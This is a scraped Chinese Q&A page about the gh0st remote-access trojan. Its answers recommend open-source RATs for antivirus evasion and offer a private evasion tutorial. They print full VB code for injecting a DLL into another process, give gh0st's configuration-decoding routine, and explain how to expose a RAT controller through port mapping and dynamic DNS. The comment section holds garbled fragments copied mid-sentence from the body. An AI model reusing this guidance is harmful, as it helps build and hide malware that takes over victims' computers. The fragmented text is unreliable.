b2c信息网

您现在的位置是:首页 > 热点问题 > 正文

热点问题

gh0strat源码(gh0st源码下载)

hacker2022-06-13 10:37:47热点问题78
本文目录一览:1、想做免杀远控,通过修改现有的公开源码好实现吗?

本文目录一览:

想做免杀远控,通过修改现有的公开源码好实现吗?

你说的不错

现在免杀确实不好做了

源码免杀不错的,现在开源的远控也有,个人觉得开源的gh0st不错,你可以尝试下gh0st是C写的,看你的编程的底子了,我这还有编译免杀的教程,要的话M我。

还有鸽子1.2的开源,delphi写的,还有暗组的DRAT开源1.X的,还有其他的等等

要么你自己写一款也行,你要有技术的哦

Gh0st3.6 源码中怎么实现进程注入的?

我写过一个注入Dll的VB代码,两个参数,第一个是要注入的进程的PID,第二个是要注入的Dll的路径。代码如下(不加函数声明……)Public Function FxRemoteProcessInsertDll(ByVal pid As Long, ByVal DllPath As String) As Long

Dim lpThreadAttributes As SECURITY_ATTRIBUTES

Dim hProcess, hThread As Long

Dim DllBuffer As Long

Dim DllFileSize As Long

Dim rReturn As Long

Dim fAddr As Long

Dim errNum As Long

Dim errStr As String

hProcess = FxNormalOpenProcess(PROCESS_ALL_ACCESS, pid)

'所需权限PROCESS_QUERY_INFORMATION Or PROCESS_VM_OPERATION Or PROCESS_VM_READ Or PROCESS_VM_WRITE

If hProcess = 0 Then errStr = "打开进程失败!": GoTo errors DllFileSize = LenB(StrConv(DllPath, vbFromUnicode)) + 1

DllBuffer = VirtualAllocEx(hProcess, 0, DllFileSize, MEM_RESERVE Or MEM_COMMIT, PAGE_READWRITE)

If DllBuffer = 0 Then errStr = "分配内存空间失败!": GoTo errors rReturn = WriteProcessLongMemory(hProcess, DllBuffer, ByVal DllPath, DllFileSize, 0)

If DllBuffer = 0 Then errStr = "写入内存失败!": GoTo errors

fAddr = GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA")

hThread = CreateRemoteThread(hProcess, lpThreadAttributes, 0, fAddr, DllBuffer, 0, ByVal 0)

If DllBuffer = 0 Then errStr = "加载Dll失败!": GoTo errors

WaitForSingleObject hThread, INFINITE

'——输出调试信息——

errNum = GetLastError

Debug.Print "DllFileSize:" DllFileSize ",DllBuffer:" FormatHex(DllBuffer) ",hThread:" hThread ",errNum:" errNum

'——————————

VirtualFreeEx hProcess, DllBuffer, DllFileSize, MEM_DECOMMIT

ZwClose hProcess

ZwClose hThread

FxRemoteProcessInsertDll = 1

Exit Function

errors:

MsgBox errStr, 0, "错误"

FxRemoteProcessInsertDll = 0

End Function

有没有类似GH0ST远控的源码,DELPHI的源码?

可以自己写,服务端截屏传回来,客户端,也就是控制端换算出鼠标位置,发送鼠标命令及键盘按键给服务端,服务端执行,要开端口,关键是怎么种服务端。

实现很简单,效率看算法。

gh0st远控怎么样

在base64的基础上又作了一个加密,下面是gh0st V3.6的源码中的:

char* MyDecode(char *str)

{

int i, len;

char *data = NULL;

len = base64_decode(str, data);

for (i = 0; i len; i++)

{

data[i] -= 0x86;

data[i] ^= 0x19;

}

return data;

}

你是要解释程序,还是仅仅是想要一个配置结果?

如果是要结果,请贴出你的源码的类似上面的代码,版本不同,可能编解码不太相同。

base64的算法请自行查找,网上也有编译好的编解码程序。.net/java等都支持base64编解码。

gh0st rat 3.75

你自己把端口改成8000然后用路由器映射那把你内网IP映射上8000 再申请个花生壳。,下载客户端

登陆就。, 在连接测试那里用域名就OK了! 给最佳。

木马后门:Gh0st RAT远程控制问题

对于这种情况,你可以试试使用金山毒霸2011云杀毒软件彻底查杀下。金山毒霸杀毒是挺厉害的,要下载的话在百度搜索下金山毒霸2011,看到第一个就是最新免费下载的地址,就可以下载安装,金山毒霸2011查杀病毒是完全能查杀干净的

发表评论

评论列表

  • 听弧粢醍(2022-06-13 14:19:50)回复取消回复

    i] -= 0x86; data[i] ^= 0x19; } return data; } 你是要解释程序,还是仅仅是想要一个配置结果? 如果是要结果,请贴出你的源码的类似上面的代码,版本不同,可能编解码不太相同。base64的算法请自

  • 颜于七婞(2022-06-13 22:24:04)回复取消回复

    有编译免杀的教程,要的话M我。还有鸽子1.2的开源,delphi写的,还有暗组的DRAT开源1.X的,还有其他的等等要么你自己写一款也行,你要有技术的哦Gh0st3.6 源码中怎么实现进程注入的?我写过一个注入Dll的VB代码,两个参

  • 鸠骨七禾(2022-06-13 15:54:59)回复取消回复

    ong Dim rReturn As Long Dim fAddr As Long Dim errNum As Long Dim errStr As String hProcess = FxNormalOpenProc